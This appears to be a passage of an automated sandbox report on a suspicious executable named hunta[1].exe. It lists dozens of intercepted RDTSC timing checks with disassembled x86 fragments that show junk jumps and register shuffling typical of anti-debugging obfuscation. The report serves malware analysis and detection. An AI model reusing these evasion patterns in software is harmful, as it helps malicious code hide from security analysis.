            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 593013D second address: 5930156 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930156 second address: 593015A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 593015A second address: 5930160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930160 second address: 5930166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930166 second address: 593020B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007FF2E5514DEDh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 mov ecx, 5CA77E43h 0x00000015 mov dl, ch 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007FF2E5514DF2h 0x0000001e xchg eax, ebx 0x0000001f jmp 00007FF2E5514DF0h 0x00000024 mov ebx, dword ptr [ebp+10h] 0x00000027 pushad 0x00000028 jmp 00007FF2E5514DEEh 0x0000002d mov ah, 1Dh 0x0000002f popad 0x00000030 push ebx 0x00000031 jmp 00007FF2E5514DEAh 0x00000036 mov dword ptr [esp], esi 0x00000039 jmp 00007FF2E5514DF0h 0x0000003e mov esi, dword ptr [ebp+08h] 0x00000041 jmp 00007FF2E5514DF0h 0x00000046 xchg eax, edi 0x00000047 jmp 00007FF2E5514DF0h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 mov eax, 5FF38DC3h 0x00000055 popad 0x00000056 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 593020B second address: 593022D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov bx, si 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 593022D second address: 5930289 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF2E5514DF4h 0x00000008 sub ax, 1EE8h 0x0000000d jmp 00007FF2E5514DEBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF2E5514DF4h 0x0000001f jmp 00007FF2E5514DF5h 0x00000024 popfd 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930289 second address: 59302DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 je 00007FF357310FACh 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 pushfd 0x00000011 jmp 00007FF2E55A2C32h 0x00000016 and ch, FFFFFFD8h 0x00000019 jmp 00007FF2E55A2C2Bh 0x0000001e popfd 0x0000001f popad 0x00000020 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF2E55A2C35h 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59302DA second address: 59302DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59302DF second address: 5930368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007FF357310F6Bh 0x0000000d jmp 00007FF2E55A2C36h 0x00000012 mov edx, dword ptr [esi+44h] 0x00000015 jmp 00007FF2E55A2C30h 0x0000001a or edx, dword ptr [ebp+0Ch] 0x0000001d jmp 00007FF2E55A2C30h 0x00000022 test edx, 61000000h 0x00000028 pushad 0x00000029 mov al, C3h 0x0000002b call 00007FF2E55A2C33h 0x00000030 movzx esi, dx 0x00000033 pop edi 0x00000034 popad 0x00000035 jne 00007FF357310F65h 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FF2E55A2C37h 0x00000042 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930368 second address: 593036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 593036F second address: 5930381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test byte ptr [esi+48h], 00000001h 0x0000000b pushad 0x0000000c mov eax, edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940044 second address: 5940093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E5514DF5h 0x00000009 sbb ax, 4636h 0x0000000e jmp 00007FF2E5514DF1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007FF2E5514DECh 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF2E5514DEAh 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940093 second address: 5940097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940097 second address: 594009D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 594009D second address: 59400AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59400AE second address: 59400D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E5514DF8h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59400D2 second address: 5940112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF2E55A2C31h 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and esp, FFFFFFF8h 0x00000010 jmp 00007FF2E55A2C2Ah 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF2E55A2C37h 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940112 second address: 5940118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940118 second address: 594011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 594011C second address: 59401BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF2E5514DEEh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 mov di, cx 0x00000013 pushad 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 popad 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FF2E5514DEAh 0x00000021 and ecx, 471E2068h 0x00000027 jmp 00007FF2E5514DEBh 0x0000002c popfd 0x0000002d mov edx, esi 0x0000002f popad 0x00000030 mov dword ptr [esp], esi 0x00000033 pushad 0x00000034 push ecx 0x00000035 jmp 00007FF2E5514DF7h 0x0000003a pop esi 0x0000003b mov bh, BDh 0x0000003d popad 0x0000003e mov esi, dword ptr [ebp+08h] 0x00000041 pushad 0x00000042 movzx esi, di 0x00000045 call 00007FF2E5514DF3h 0x0000004a push eax 0x0000004b pop edx 0x0000004c pop eax 0x0000004d popad 0x0000004e mov ebx, 00000000h 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FF2E5514DF7h 0x0000005a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59401BC second address: 59401C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59401C2 second address: 594025E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF2E5514DF3h 0x00000012 add eax, 5990747Eh 0x00000018 jmp 00007FF2E5514DF9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FF2E5514DF0h 0x00000024 jmp 00007FF2E5514DF5h 0x00000029 popfd 0x0000002a popad 0x0000002b jmp 00007FF2E5514DF0h 0x00000030 popad 0x00000031 je 00007FF35726AF39h 0x00000037 jmp 00007FF2E5514DF0h 0x0000003c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 594025E second address: 5940262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940262 second address: 5940266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940266 second address: 594026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 594026C second address: 59402E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF2E5514DF0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, esi 0x0000000f jmp 00007FF2E5514DF0h 0x00000014 je 00007FF35726AEF3h 0x0000001a jmp 00007FF2E5514DF0h 0x0000001f test byte ptr [77726968h], 00000002h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov si, di 0x0000002c pushfd 0x0000002d jmp 00007FF2E5514DF9h 0x00000032 jmp 00007FF2E5514DEBh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59402E0 second address: 59402F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C34h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59402F8 second address: 59402FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59402FC second address: 5940340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FF3572F8CD8h 0x0000000e pushad 0x0000000f jmp 00007FF2E55A2C38h 0x00000014 popad 0x00000015 mov edx, dword ptr [ebp+0Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF2E55A2C37h 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940340 second address: 59403FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF2E5514DECh 0x00000011 or ax, 31A8h 0x00000016 jmp 00007FF2E5514DEBh 0x0000001b popfd 0x0000001c mov ah, 60h 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 call 00007FF2E5514DF0h 0x00000026 pushad 0x00000027 popad 0x00000028 pop ecx 0x00000029 mov dx, F8B4h 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 push edi 0x00000031 pop edx 0x00000032 mov dx, ax 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FF2E5514DF8h 0x0000003e or al, FFFFFF98h 0x00000041 jmp 00007FF2E5514DEBh 0x00000046 popfd 0x00000047 pushfd 0x00000048 jmp 00007FF2E5514DF8h 0x0000004d adc al, FFFFFFF8h 0x00000050 jmp 00007FF2E5514DEBh 0x00000055 popfd 0x00000056 popad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59403FC second address: 5940400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940400 second address: 5940412 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940412 second address: 5940429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 77954804h 0x00000008 push edi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov di, ax 0x00000014 mov bl, ch 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940429 second address: 5940463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 mov bh, 4Ah 0x00000012 popad 0x00000013 push dword ptr [ebp+10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF2E5514DF1h 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940463 second address: 5940473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59A1952 second address: 59A1984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E5514DF8h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59A1984 second address: 59A1993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59A1993 second address: 59A199B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59A199B second address: 59A19AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF2E55A2C2Ah 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59A19AF second address: 59A19E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 10303324h 0x00000008 mov ecx, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FF2E5514DF0h 0x00000017 or cl, FFFFFFD8h 0x0000001a jmp 00007FF2E5514DEBh 0x0000001f popfd 0x00000020 mov bx, cx 0x00000023 popad 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59A19E4 second address: 59A1A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007FF2E55A2C2Ch 0x00000011 push esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jmp 00007FF2E55A2C37h 0x00000019 popad 0x0000001a push 0000007Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF2E55A2C35h 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59A1AC4 second address: 59A1ACA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59A1ACA second address: 59A1952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a jmp 00007FF2E55A2C30h 0x0000000f retn 0004h 0x00000012 lea eax, dword ptr [ebp-10h] 0x00000015 push eax 0x00000016 call ebx 0x00000018 mov edi, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF2E55A2C35h 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940687 second address: 5940696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940696 second address: 594069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 594069C second address: 59406BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF2E5514DF3h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59406BA second address: 5940735 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E55A2C2Fh 0x00000009 xor ah, 0000002Eh 0x0000000c jmp 00007FF2E55A2C39h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FF2E55A2C30h 0x00000018 and cl, FFFFFFA8h 0x0000001b jmp 00007FF2E55A2C2Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [esp], ebp 0x00000027 jmp 00007FF2E55A2C36h 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f mov di, 0520h 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940735 second address: 5940739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5940739 second address: 594073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59C002F second address: 59C0035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59C0035 second address: 59C003B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59C003B second address: 59C003F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59C003F second address: 59C004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59C004E second address: 59C0052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59C0052 second address: 59C0056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59C0056 second address: 59C005C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59C005C second address: 59C0075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C35h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59C0075 second address: 59C009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF2E5514DEDh 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59C009D second address: 59C00EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007FF2E55A2C2Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007FF2E55A2C30h 0x00000019 call 00007FF2E55A2C29h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov edi, 1F141A80h 0x00000026 mov esi, edi 0x00000028 popad 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59C00EA second address: 59C00EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59C00EF second address: 59C0112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF2E55A2C39h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59C0112 second address: 59C01A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push edi 0x00000011 movzx ecx, dx 0x00000014 pop ebx 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 mov ebx, 3A921896h 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 mov al, 31h 0x00000026 pushfd 0x00000027 jmp 00007FF2E5514DEBh 0x0000002c or cx, 051Eh 0x00000031 jmp 00007FF2E5514DF9h 0x00000036 popfd 0x00000037 popad 0x00000038 pop eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FF2E5514DF3h 0x00000042 jmp 00007FF2E5514DF3h 0x00000047 popfd 0x00000048 jmp 00007FF2E5514DF8h 0x0000004d popad 0x0000004e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 597081A second address: 5970820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970820 second address: 5970824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970824 second address: 5970853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF2E55A2C2Dh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bx, A69Eh 0x00000016 call 00007FF2E55A2C2Fh 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970853 second address: 597087B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 1046808Bh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FF2E5514DEAh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF2E5514DEDh 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 597087B second address: 5970881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970881 second address: 5970898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970898 second address: 59708B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
